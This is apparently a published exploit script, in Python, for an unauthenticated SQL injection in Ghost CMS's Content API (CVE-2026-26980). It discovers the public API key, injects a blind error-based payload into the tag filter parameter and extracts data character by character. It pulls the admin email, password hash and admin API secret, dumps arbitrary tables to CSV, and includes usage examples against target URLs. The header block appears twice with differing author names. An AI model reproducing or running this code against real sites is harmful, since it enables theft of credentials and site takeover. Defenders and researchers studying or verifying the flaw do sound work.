# Exploit Title: Ghost CMS 6.19.0 - SQLi
# Date: 2026-03-30
# Exploit Author: Maksim Rogov
# Exploit Licence: GPL-3.0
# Software Link: https://ghost.org/
# Version: Ghost >=3D 3.24.0, <=3D 6.19.0
# Tested on: Ghost 6.16.1
# CVE : CVE-2026-26980

# Exploit Title: Ghost CMS Unauthenticated SQLi via Content API
# Exploit Author: vognik
# Software Link: https://ghost.org/
# Version: Ghost >= 3.24.0, <= 6.19.0
# Tested on: Ghost 6.16.1
# CVE : CVE-2026-26980

#!/usr/bin/env python3

import requests
import re
import sys
import argparse
import textwrap
import csv
from typing import Optional
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin, urlparse

CHARSET = "".join(sorted(set("$./0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz@!#%^&*()+-=")))
ERROR_INDICATOR = "InternalServerError"
DEFAULT_API_PATH = "/ghost/api/content/"
DEFAULT_THREADS = 15

class GhostExploit:
    def __init__(self, target_url: str, threads: int = DEFAULT_THREADS, dbms: str = "sqlite", output: str = None, user_cols: str = None, verify: bool = True, manual_key: str = None, manual_path: str = None):
        self.target = target_url.rstrip('/')
        self.threads = threads
        self.dbms = dbms.lower()
        self.output = output
        self.user_cols = [c.strip() for c in user_cols.split(',')] if user_cols else None
        self.session = requests.Session()
        self.session.verify = verify
        self.manual_key = manual_key
        self.manual_path = manual_path
        if not verify:
            import urllib3
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        self.api_key, self.endpoint, self.tag_slug, self.tag_id, self.url_template = "", "", "", "", ""

    def to_char_hex(self, s: str):
        if self.dbms == "mysql":
            return "0x" + "".join([f"{ord(c):02x}" for c in s])
        return "||".join([f"char({ord(c)})" for c in s])

    def _get_metadata_from_page(self) -> tuple[Optional[str], Optional[str]]:
        try:
            r = self.session.get(self.target, timeout=10)
            r.raise_for_status()

            key = re.search(r'data-key="([a-f0-9]+)"', r.text)
            api = re.search(r'data-api="([^"]+)"', r.text)

            found_key = key.group(1) if key else None
            found_path = urlparse(api.group(1)).path if api else None
            return found_key, found_path
        except Exception:
            return None, None

    def discover(self) -> bool:
        found_key, found_path = None, None

        if not self.manual_key or not self.manual_path:
            found_key, found_path = self._get_metadata_from_page()

        self.api_key = self.manual_key or found_key
        final_path = self.manual_path or found_path or DEFAULT_API_PATH

        if not self.api_key:
            return False

        self.endpoint = urljoin(self.target, final_path).rstrip('/') + '/'

        try:
            test_url = f"{self.endpoint}tags/"
            r = self.session.get(test_url, params={'key': self.api_key}, timeout=10)
            r.raise_for_status()

            json_data = r.json()
            if 'tags' in json_data and json_data['tags']:
                tag = json_data['tags'][0]
                self.tag_slug, self.tag_id = tag['slug'], tag['id']
                self.url_template = (
                    f"{self.endpoint}tags/?key={self.api_key}"
                    f"&filter=slug:['*',{self.tag_slug}]&limit=all"
                )
                return True
        except Exception:
            pass

        return False

    def check(self, cond: str) -> bool:
        if self.dbms == "mysql":
            err_payload = "(SELECT exp(710))"
        else:
            err_payload = "(SELECT abs(-9223372036854775808))"

        payload = f" OR ({cond}) THEN {err_payload} WHEN slug="
        try:
            r = self.session.get(self.url_template.replace("*", payload, 1), timeout=7)
            return ERROR_INDICATOR.lower() in r.text.lower()
        except Exception:
            return False

    def get_len(self, query: str) -> int:
        length = 0
        for bit in [64, 32, 16, 8, 4, 2, 1]:
            if self.check(f"LENGTH(({query}))>={length + bit}"):
                length += bit
        return length

    def get_char(self, query: str, pos: int) -> str:
        low, high = 0, len(CHARSET) - 1
        while low < high:
            mid = (low + high) // 2
            char_code = ord(CHARSET[mid + 1])

            if self.dbms == "mysql":
                cond = f"ASCII(SUBSTR(({query}) FROM {pos} FOR 1))>={char_code}"
            else:
                prefix = "||".join(["char(63)"] * (pos - 1))
                c_range = f"char(91)||char({char_code})||char(45)||char({ord(CHARSET[-1])})||char(93)"
                cond = f"({query}) GLOB {prefix}||{c_range}||char(42)" if prefix else f"({query}) GLOB {c_range}||char(42)"

            if self.check(cond):
                low = mid + 1
            else:
                high = mid
        return CHARSET[low]

    def extract(self, query: str, label: str, force_len: int = None) -> str:
        length = force_len if force_len is not None else self.get_len(query)
        if length <= 0:
            return ""

        chars = [""] * length
        with ThreadPoolExecutor(max_workers=self.threads) as ex:
            futures = {ex.submit(self.get_char, query, i+1): i for i in range(length)}
            for f in futures:
                chars[futures[f]] = f.result()
                sys.stdout.write(f"\r  {label} ({length} chars): {''.join(c if c else '.' for c in chars)}")
                sys.stdout.flush()
        res = "".join(chars)
        sys.stdout.write(f"\r  {label} ({length} chars): {res}\n")
        return res

    def print_table(self, columns, rows):
        if not rows:
            return
        widths = {col: len(col) for col in columns}
        for row in rows:
            for col in columns:
                widths[col] = max(widths[col], len(str(row.get(col, ""))))

        sep = "+" + "+".join(["-" * (widths[col] + 2) for col in columns]) + "+"
        head = "|" + "|".join([f" {col.ljust(widths[col])} " for col in columns]) + "|"

        print("\n" + sep)
        print(head)
        print(sep)
        for row in rows:
            line = "|" + "|".join([f" {str(row.get(col, '')).ljust(widths[col])} " for col in columns]) + "|"
            print(line)
        print(sep + "\n")

    def dump_table(self, table_name: str):
        print(f"\n[*] Dumping table: {table_name}")
        cast_type = "CHAR" if self.dbms == "mysql" else "TEXT"

        count_str = self.extract(f"SELECT CAST(COUNT(*) AS {cast_type}) FROM {table_name}", "Total records")
        count = int(count_str) if count_str.isdigit() else 0
        if count == 0:
            print("[!] No records found or table doesn't exist.")
            return

        if self.user_cols:
            columns = self.user_cols
            print(f"[*] Using user-defined columns: {', '.join(columns)}")
        elif self.dbms == "sqlite":
            t_name_char = self.to_char_hex(table_name)
            schema_query = f"SELECT sql FROM sqlite_master WHERE name={t_name_char}"
            cols_raw = self.extract(schema_query, "Schema")
            columns = re.findall(r'([a-zA-Z_]+)\s+(?:TEXT|VARCHAR|INT|DATETIME|TIMESTAMP|BOOLEAN)', cols_raw, re.I)
        else:
            columns = ['id', 'email', 'name', 'password', 'status']

        if not columns:
            columns = ['id', 'email']

        all_rows = []
        for i in range(count):
            print(f"\n  --- Record #{i+1} ---")
            current_row = {}
            for col in columns:
                val = self.extract(f"SELECT {col} FROM {table_name} LIMIT 1 OFFSET {i}", col)
                current_row[col] = val
            all_rows.append(current_row)

        self.print_table(columns, all_rows)

        if self.output:
            try:
                with open(self.output, 'w', newline='', encoding='utf-8') as f:
                    writer = csv.DictWriter(f, fieldnames=columns)
                    writer.writeheader()
                    writer.writerows(all_rows)
                print(f"[+] Exported to {self.output}")
            except Exception as e:
                print(f"[!] Export error: {e}")

    def run_passive_check(self):
        print(f"[*] Passive check for: {self.target}")
        try:
            r = self.session.get(self.target, timeout=10)
            m = re.search(r'<meta name="generator" content="Ghost\s+([\d\.]+)', r.text)
            if m:
                ver_str = m.group(1)
                v = [int(x) for x in ver_str.split('.') if x.isdigit()]

                major = v[0] if len(v) > 0 else 0
                minor = v[1] if len(v) > 1 else 0

                is_v = (major == 3 and minor >= 24) or (4 <= major <= 5) or (major == 6 and minor <= 19)
                status = "appears to be vulnerable" if is_v else "is not vulnerable"
                print(f"[+] Passive result: version {ver_str} {status}")
            else:
                print("[-] Meta generator tag not found. Passive check failed.")
        except Exception as e:
            print(f"[!] Error during passive check: {e}")

    def run_default_flow(self):
        LIMIT = "LIMIT 1"
        ORDER_BY_CREATED_ASC = "ORDER BY id ASC"
        adm_type = self.to_char_hex("admin")
        cast_t = "CHAR" if self.dbms == "mysql" else "TEXT"

        print("\n[*] Phase 1: Recon (fast checks)")
        l_email = self.get_len(f"SELECT email FROM users {ORDER_BY_CREATED_ASC} {LIMIT}")
        print(f"  length(users.email) = {l_email}")
        l_pass = self.get_len(f"SELECT password FROM users {ORDER_BY_CREATED_ASC} {LIMIT}")
        print(f"  length(users.password) = {l_pass}")
        l_name = self.get_len(f"SELECT name FROM users {ORDER_BY_CREATED_ASC} {LIMIT}")
        print(f"  length(users.name) = {l_name}")
        l_status = self.get_len(f"SELECT status FROM users {ORDER_BY_CREATED_ASC} {LIMIT}")
        print(f"  length(users.status) = {l_status}")

        for t in ["users", "members", "api_keys", "sessions"]:
            self.extract(f"SELECT CAST(COUNT(*) AS {cast_t}) FROM {t}", f"count({t})")

        print("\n[*] Phase 2: Extracting values")

        self.extract(f"SELECT email FROM users {ORDER_BY_CREATED_ASC} {LIMIT}", "Admin email", l_email)
        self.extract(f"SELECT name FROM users {ORDER_BY_CREATED_ASC} {LIMIT}", "Admin name", l_name)

        self.extract(f"SELECT id FROM api_keys WHERE type={adm_type} AND user_id IS NOT NULL {ORDER_BY_CREATED_ASC} {LIMIT}", "Admin API key ID")
        self.extract(f"SELECT secret FROM api_keys WHERE type={adm_type} AND user_id IS NOT NULL {ORDER_BY_CREATED_ASC} {LIMIT}", "Admin API secret")
        self.extract(f"SELECT password FROM users {ORDER_BY_CREATED_ASC} {LIMIT}", "Password hash", l_pass)

    def print_banner(self):
        print("================================================================")
        print("Ghost CMS - Unauthenticated SQLi Data Extraction")
        print(f"Target:   {self.target}")
        print(f"API Key:  {self.api_key}")
        print(f"Tag ID:   {self.tag_id}")
        print("Endpoint: Content API (public, no auth)")
        print("================================================================")

    def run(self, table_to_dump: Optional[str] = None, check_mode: Optional[str] = None):
        if check_mode == "passive":
            return self.run_passive_check()

        if not self.discover():
            print("[!] Discovery failed. Could not find API Key or Endpoint.")
            return

        if check_mode == "active":
            print(f"[*] Active check for: {self.target}")
            is_v = self.check("1=1")
            status = "vulnerable" if is_v else "not vulnerable"
            print(f"[*] Active check: the target is {status}.")
            return

        self.print_banner()

        if not self.check("1=1"):
            print("\n[*] Calibrating oracle...")
            print("[!] Oracle calibration failed. Target might be patched or DBMS is wrong.")
            return
        else:
            print("\n[*] Calibrating oracle... OK")

        if table_to_dump:
            self.dump_table(table_to_dump)
        else:
            self.run_default_flow()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent("""
            Usage examples:
            python3 main.py -u http://target.com
            (Quickly extract admin email and password hash from a default SQLite setup)

            python3 main.py -u http://target.com -c passive
            (Check the site for the vulnerability using the meta tag on the main page)

            python3 main.py -u http://target.com -d mysql -T users -C email,password -o ./result.csv
            (Dump the "email" and "password" columns from the "users" table and save the result to "result.csv")

            python3 main.py -u http://target.com -d mysql -T api_keys -t 25
            (Dump all API keys from the "api_keys" table using 25 threads)

            Note: Most production Ghost instances use MySQL. Local/Small blogs use SQLite.
        """)
    )

    group_conn = parser.add_argument_group("Connection settings")
    group_conn.add_argument("-u", "--url", required=True, metavar="URL",
                            help="Set target Ghost instance URL")
    group_conn.add_argument("-a", "--api-key", metavar="KEY",
                            help="Set Content API key (skips auto-discovery)")
    group_conn.add_argument("-p", "--api-path", metavar="PATH", default=None,
                            help="Set Content API path (default: %(default)s)")
    group_conn.add_argument("-k", "--insecure", action="store_true",
                            help="Skip SSL certificate verification")

    group_extr = parser.add_argument_group("Extraction settings")
    group_extr.add_argument("-c", "--check", metavar="MODE", choices=["passive", "active"],
                            help="Verify vulnerability: passive (meta tags) or active (SQL error)")
    group_extr.add_argument("-d", "--dbms", default="sqlite", choices=["sqlite", "mysql"],
                            help="Select database engine (default: %(default)s)")
    group_extr.add_argument("-T", "--table", metavar="NAME",
                            help="Set database table to dump (e.g., users, api_keys)")
    group_extr.add_argument("-C", "--columns", metavar="COL1,COL2",
                            help="Set columns to extract (comma-separated)")
    group_extr.add_argument("-t", "--threads", type=int, default=DEFAULT_THREADS, metavar="N",
                            help="Set number of concurrent threads (default: %(default)s)")

    group_out = parser.add_argument_group("Output settings")
    group_out.add_argument("-o", "--output", metavar="FILE",
                        help="Save results to the specified CSV file")
    args = parser.parse_args()

    try:
        exploit = GhostExploit(args.url, args.threads, args.dbms, args.output, args.columns, not args.insecure, args.api_key, args.api_path)
        exploit.run(args.table, args.check)
    except KeyboardInterrupt:
        print("\n[!] Aborted")